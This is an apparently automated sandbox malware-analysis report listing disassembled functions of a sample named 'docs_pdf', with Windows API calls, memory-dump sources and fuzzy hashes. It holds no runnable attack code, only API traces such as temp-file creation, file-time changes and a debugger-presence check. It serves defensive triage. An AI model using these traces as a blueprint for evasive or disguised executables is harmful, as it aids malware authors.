                                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction ID: 6f6c57dc8d2f81618765d3df58347b249f6bdfbc1a0a17cb4df9472225f20c97
                                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction Fuzzy Hash: 735171B1D04219AFDF249F65CC40ADEBBBAEF48304F04049EB649A7241DB395A80CF58
                                    Function 00FD493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction ID: a12b4d96264eebf1ae32bbf544b50395127d4d96c4a3c6137d9f675725e73c11
                                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction Fuzzy Hash: 2A41D671A006069BDF18CFAAC89096F77A7EF80360B2C813FE855C7740D774AD40AB45
                                    Function 00FB73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00FEEE62
                                    • GetOpenFileNameW.COMDLG32(?), ref: 00FEEEAC
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                      • Part of subcall function 00FD09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen_memset
                                    • String ID: X
                                    • API String ID: 3777226403-3081909835
                                    • Opcode ID: 36c087876595c5e888e2ed17655a07d6e5171d6a257b3d0385da9769b14309bf
                                    • Instruction ID: 424705da6f15eac25e8ff1800b5a02cd0c3165d4d0a6fa2b7dd42728c34d88be
                                    • Opcode Fuzzy Hash: 36c087876595c5e888e2ed17655a07d6e5171d6a257b3d0385da9769b14309bf
                                    • Instruction Fuzzy Hash: 0F21C371E002989BCB15EF95CC45BEE7BFD9F49314F04801AE408E7281DBB859899FA1
                                    Function 0101901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    • Opcode ID: f26499913e42db5ebeb22ed7826db49eef33bde3db6531be0ca341bb002d255c
                                    • Instruction ID: 08576c0e2acb5d08031e5510dd150c1681f2a241252f39ea8fe90a2a75409db3
                                    • Opcode Fuzzy Hash: f26499913e42db5ebeb22ed7826db49eef33bde3db6531be0ca341bb002d255c
                                    • Instruction Fuzzy Hash: 5D01F972904258BEDB29D7A8CC16EFEBBFC9B01201F04419FF592D2281E579A604DB60
                                    Function 01019B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 01019B82
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01019B99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 9a84c48db8aed5089ac9cf1b33b59b40403875e01dd6fa916da07346e5aa59bb
                                    • Instruction ID: 6da53c9ecf4a24e18e399fd63bc20d2b08ee498117527b473eeac722ddfc8213
                                    • Opcode Fuzzy Hash: 9a84c48db8aed5089ac9cf1b33b59b40403875e01dd6fa916da07346e5aa59bb
                                    • Instruction Fuzzy Hash: 04D05E7994030EEBDB20AA90DC0EF9AB72CE744700F0042A1BE9496091DEB555988B92
                                    Function 0102CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be643edb670c4a5e166878fd7caf233d884c8b6b8b83d94ce37a4247d0782d13
                                    • Instruction ID: 56ab59e02820b244cd9fdc66ce8cce658132f8ad42f3841318f599e751bab570
                                    • Opcode Fuzzy Hash: be643edb670c4a5e166878fd7caf233d884c8b6b8b83d94ce37a4247d0782d13
                                    • Instruction Fuzzy Hash: 35F16670A083119FCB10DF68C880A6ABBE5FF89314F14896EF8999B351D775E945CF82
                                    Function 00FBF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD03D3
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD03DB
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD03E6
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD03F1
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD03F9
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD0401
                                      • Part of subcall function 00FC6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FBFA90), ref: 00FC62B4
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FBFB2D
                                    • OleInitialize.OLE32(00000000), ref: 00FBFBAA
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF49F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: f1c82adcce72e90e57865016d54d62beaeb45e5308c77f5d24a3276a4e9f11ed
                                    • Instruction ID: 066a2a6c47f2924878ed99c3c1d295a733891a4667b8a9e229dc9f19e868856b
                                    • Opcode Fuzzy Hash: f1c82adcce72e90e57865016d54d62beaeb45e5308c77f5d24a3276a4e9f11ed
                                    • Instruction Fuzzy Hash: 0981BBB0D01A418FE3A8EF3AE5556557BE6FB88304710812A90DBE724AEF3F5408DF55
                                    Function 00FD594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FDA3AB: __NMSG_WRITE.LIBCMT ref: 00FDA3D2
                                      • Part of subcall function 00FDA3AB: __NMSG_WRITE.LIBCMT ref: 00FDA3DC
                                    • __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FDA408: GetModuleFileNameW.KERNEL32(00000000,010743BA,00000104,?,00000001,00000000), ref: 00FDA49A
                                      • Part of subcall function 00FDA408: ___crtMessageBoxW.LIBCMT ref: 00FDA548
                                      • Part of subcall function 00FD32DF: ___crtCorExitProcess.LIBCMT ref: 00FD32E5
                                      • Part of subcall function 00FD32DF: ExitProcess.KERNEL32 ref: 00FD32EE
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: f2ca77ab3b57ca8b47acad2151e75dc5997e96b39a29eb3081f16f3605aea43d
                                    • Instruction ID: 66b185d393b7655c69d772052db3157831612f15da93934ef8e43941bceed0cb
                                    • Opcode Fuzzy Hash: f2ca77ab3b57ca8b47acad2151e75dc5997e96b39a29eb3081f16f3605aea43d
                                    • Instruction Fuzzy Hash: 3401D632A40616DED6212725EC6272D725B8F52B70F1C0027F500AB3C1DE799D01B766
                                    Function 01019B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,010197D2,?,?,?,?,?,00000004), ref: 01019B45
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,010197D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 01019B5B
                                    • CloseHandle.KERNEL32(00000000,?,010197D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01019B62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 40a2f379a7d0b73c7b6dcd19048f331f39128b7fd9758dca674b712df1e60dc3
                                    • Instruction ID: 627f2afa6e05091f15d17168e259319cd41af7ceb4a40a8b0d289a58053dd3e4
                                    • Opcode Fuzzy Hash: 40a2f379a7d0b73c7b6dcd19048f331f39128b7fd9758dca674b712df1e60dc3
                                    • Instruction Fuzzy Hash: ACE08632580315B7E7311A54EC09FDA7F5CAB06765F108210FB94690D0C7B625119799
                                    Function 01018F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 01018FA5
                                      • Part of subcall function 00FD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD9C64), ref: 00FD2FA9
                                      • Part of subcall function 00FD2F95: GetLastError.KERNEL32(00000000,?,00FD9C64), ref: 00FD2FBB
                                    • _free.LIBCMT ref: 01018FB6
                                    • _free.LIBCMT ref: 01018FC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction ID: b37d92de93c8eef7bb9832b1a40e55e7fde4ebf7ee075e68276b772b77ee027d
                                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction Fuzzy Hash: 03E0C2A13087004ADAA4A63CAD00E872BEF0F4821070C0C4FB649DB24ACF2CE5409064
                                    Function 00FBAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    • Opcode ID: 15bdc051ca4f49b3ecc28e5489f1e66a68ecd639d856a41f294dc5daff8f1965
                                    • Instruction ID: 188ffbf30d07b65775f57537ba457f4fa23d6ae10ba1c48170b10d2086de84e2
                                    • Opcode Fuzzy Hash: 15bdc051ca4f49b3ecc28e5489f1e66a68ecd639d856a41f294dc5daff8f1965
                                    • Instruction Fuzzy Hash: A0226971908241DFC724DF15C894BAABBE1BF88310F14895DE8968B362DB75EC45EF82
                                    Function 00FB4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    • Opcode ID: c6fb83b5fc2665f2292e9cd2df0282a405f87eb817b54438c791581100e5d6b2
                                    • Instruction ID: aab5e865a44408c8379f0582e58456c5445d2ab9a66fa3cee4a7294822dde850
                                    • Opcode Fuzzy Hash: c6fb83b5fc2665f2292e9cd2df0282a405f87eb817b54438c791581100e5d6b2
                                    • Instruction Fuzzy Hash: A6417D22E041546BDF219F668E517FE7FB6AB05310F284065F8829B283C629FD40BFA1
                                    Function 00FB492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsThemeActive.UXTHEME ref: 00FB4992
                                      • Part of subcall function 00FD35AC: __lock.LIBCMT ref: 00FD35B2
                                      • Part of subcall function 00FD35AC: DecodePointer.KERNEL32(00000001,?,00FB49A7,010081BC), ref: 00FD35BE
                                      • Part of subcall function 00FD35AC: EncodePointer.KERNEL32(?,?,00FB49A7,010081BC), ref: 00FD35C9
                                      • Part of subcall function 00FB4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FB4A73
                                      • Part of subcall function 00FB4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB4A88
                                      • Part of subcall function 00FB3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB3B7A
                                      • Part of subcall function 00FB3B4C: IsDebuggerPresent.KERNEL32 ref: 00FB3B8C
                                      • Part of subcall function 00FB3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010762F8,010762E0,?,?), ref: 00FB3BFD
                                      • Part of subcall function 00FB3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00FB3C81
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB49D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                    • String ID:
                                    • API String ID: 1438897964-0
                                    • Opcode ID: e50f38062eba2d5434dd91f8392dab1498ced5fb70bf0c94981d62a73e34cd56
                                    • Instruction ID: 0d24e69a134070d074b082d6354c03df1042782623d2eac44db1a95b1862fe09
                                    • Opcode Fuzzy Hash: e50f38062eba2d5434dd91f8392dab1498ced5fb70bf0c94981d62a73e34cd56
                                    • Instruction Fuzzy Hash: 9A11CD719087019BD320EF2AE80594AFBE8FF85710F00851EF185A32A2DBBA9545DF92
                                    Function 00FB5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FB5981,?,?,?,?), ref: 00FB5E27
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FB5981,?,?,?,?), ref: 00FEE19C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 0f3310e11a8a8f945dc31086a911246fc15a8a6ae3ad1c9f15011ba5c7ac90b3
                                    • Instruction ID: 51904807062f1134dd547e8a71d49415daaceae0b20ef61a2adb0191cbd4ac13
                                    • Opcode Fuzzy Hash: 0f3310e11a8a8f945dc31086a911246fc15a8a6ae3ad1c9f15011ba5c7ac90b3
                                    • Instruction Fuzzy Hash: E801F570640308BEF3250E25DC8AFB23B9CEB01B78F108308BAE56A1D0C7B95E45AF10
                                    Function 00FD0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD594C: __FF_MSGBANNER.LIBCMT ref: 00FD5963
                                      • Part of subcall function 00FD594C: __NMSG_WRITE.LIBCMT ref: 00FD596A
                                      • Part of subcall function 00FD594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,00FD1013,?), ref: 00FD598F
                                    • std::exception::exception.LIBCMT ref: 00FD102C
                                    • __CxxThrowException@8.LIBCMT ref: 00FD1041
                                      • Part of subcall function 00FD87DB: RaiseException.KERNEL32(?,?,?,0106BAF8,00000000,?,?,?,?,00FD1046,?,0106BAF8,?,00000001), ref: 00FD8830
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 3902256705-0
                                    • Opcode ID: 8ae407e14e7a6cef1c78ea843b46b29df3fe6c12c00353ccec6ae57f0572c0dc
                                    • Instruction ID: 5758d25237dfe514c2b1046f193b3e376480644881baa39b458991aac9ba9c0a
                                    • Opcode Fuzzy Hash: 8ae407e14e7a6cef1c78ea843b46b29df3fe6c12c00353ccec6ae57f0572c0dc
                                    • Instruction Fuzzy Hash: 97F0F4B5600209B7CB24BA58FC05ADF7BAEAF00760F180027F844A6341DF758AC1A291
                                    Function 00FD582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 77248548c86c54b4d34f732e8930608681697485fd43de8e441e743415d0c3da
                                    • Instruction ID: 0ae551bf1dff198d361b96e8f0feb8a0ad92171b0643558a103d132d8ec7ae01
                                    • Opcode Fuzzy Hash: 77248548c86c54b4d34f732e8930608681697485fd43de8e441e743415d0c3da
                                    • Instruction Fuzzy Hash: 07014871C40609EBCF11AF698C0659E7B63AF80760F1C4217F8245B361DB35C612FB51
                                    Function 00FD55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • __lock_file.LIBCMT ref: 00FD561B
                                      • Part of subcall function 00FD6E4E: __lock.LIBCMT ref: 00FD6E71
                                    • __fclose_nolock.LIBCMT ref: 00FD5626
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
